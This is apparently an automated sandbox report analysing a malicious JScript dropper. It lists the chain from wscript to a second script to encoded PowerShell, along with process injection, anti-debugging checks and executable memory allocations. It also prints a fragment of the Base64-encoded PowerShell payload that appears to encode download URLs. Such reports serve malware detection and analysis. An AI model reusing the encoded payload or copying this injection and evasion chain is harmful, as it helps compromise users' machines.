Summary | ZeroBOX

Berninesque.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 May 24, 2023, 4:58 p.m. May 24, 2023, 5 p.m.
Size 231.6KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 afd901a05b3501b938b9e78d48e1f5e3
SHA256 04d8c93ca76faf5b2033414573de8422f2233f9292328fb3f5da800beca73e08
CRC32 7A7C61E2
ssdeep 3072:0ipNtzYMGxJBdjOlGEfCy3IA6QHddDAZAGZjaOu4PseK8LICgJDA3Um:3NxGPBd6XCkIAd+VpEYICgJ4
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Berninesque.js

    1636
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene

      2504
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"

        236

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004886e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488420
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488020
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004881e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00488620
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004884e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00487c60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 236
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02632000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02642000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02643000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02644000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02677000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02675000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02645000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0266c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02646000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02665000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02666000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02667000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02668000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02669000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ada000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02add000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ade000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02adf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c32000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 236
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c33000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
cmdline powershell -encodedcommand "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"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: wscript
parameters: "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene
filepath: wscript
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -encodedcommand "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"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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"
parent_process wscript.exe martian_process powershell -encodedcommand "[Base64-encoded command omitted]"
QB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="
parent_process wscript.exe martian_process wscript "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\ProgramData\ConvenerCushaw.js" Deforces Unextorted Unfaceted Lophotriaene
Process injection Process 1636 resumed a thread in remote process 2504
Process injection Process 2504 resumed a thread in remote process 236
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2504
1 0 0

NtResumeThread

thread_handle: 0x0000033c
suspend_count: 1
process_identifier: 236
1 0 0
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe